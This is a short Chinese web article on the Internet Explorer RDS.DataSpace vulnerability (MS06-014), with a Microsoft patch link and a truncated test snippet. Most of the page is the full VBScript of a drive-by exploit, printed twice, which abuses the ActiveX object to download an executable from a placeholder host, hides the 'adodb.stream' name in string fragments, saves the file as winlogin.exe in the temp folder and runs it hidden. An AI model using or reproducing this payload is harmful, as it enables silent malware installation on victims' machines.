【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件
程序员文章站
2023-12-09 23:20:27
请执行下面的代码测试您的机器是否存在漏洞:
try
{
var dts = new activexobject("rds.dataspace")...
请执行下面的代码测试您的机器是否存在漏洞:
[ctrl+a 全选 注:引入外部js需再刷新一下页面才能执行]
补丁下载:http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
set df = document.createelement("object")
df.setattribute "classid", "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36"
str="microsoft.xmlhttp"
set x = df.createobject(str,"")
a1="ado"
a2="db."
a3="str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set s = df.createobject(str5,"")
s.type = 1
str6="get"
x.open str6, dl, false
x.send
fname1="winlogin.exe"
set f = df.createobject("scripting.filesystemobject","")
set tmp = f.getspecialfolder(2)
fname1= f.buildpath(tmp,fname1)
s.open
s.write x.responsebody
s.savetofile fname1,2
s.close
set q = df.createobject("shell.application","")
q.shellexecute fname1,"","","open",0
[ctrl+a 全选 注:引入外部js需再刷新一下页面才能执行]
补丁下载:http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
复制代码 代码如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
set df = document.createelement("object")
df.setattribute "classid", "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36"
str="microsoft.xmlhttp"
set x = df.createobject(str,"")
a1="ado"
a2="db."
a3="str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set s = df.createobject(str5,"")
s.type = 1
str6="get"
x.open str6, dl, false
x.send
fname1="winlogin.exe"
set f = df.createobject("scripting.filesystemobject","")
set tmp = f.getspecialfolder(2)
fname1= f.buildpath(tmp,fname1)
s.open
s.write x.responsebody
s.savetofile fname1,2
s.close
set q = df.createobject("shell.application","")
q.shellexecute fname1,"","","open",0